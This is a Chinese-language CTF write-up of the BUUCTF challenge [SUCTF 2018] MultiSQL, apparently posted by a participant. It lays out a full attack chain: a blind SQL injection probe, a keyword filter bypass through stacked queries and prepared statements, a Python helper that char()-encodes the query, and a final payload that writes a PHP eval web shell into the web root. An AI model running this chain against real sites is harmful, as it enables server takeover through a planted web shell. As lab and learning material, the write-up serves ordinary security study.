BUUCTF:[SUCTF 2018]MultiSQL
两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id
存在盲注,flag不在数据库当中,需要利用注入getshell
二次注入我没有成功getshell,先看?id
,注册一个用户,登入查看信息
?id=2^(if(ascii(mid(user(),1,1))>0,0,1))
判断存在注入,2异或0还是为2
fuzz测试后发现过滤了union,select ,&,|
,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()
绕过,需要执行的语句
select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';
使用脚本编程十进制:
str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
if i == 0:
print('char(%s'%ord(str[i]),end="")
else:
print(',%s'%ord(str[i]),end="")
print(')')
运行结果
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)
payload:
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;
http://71730bda-76d9-4979-ab53-0d0ba83dffdc.node3.buuoj.cn/favicon/shell.php
查看shell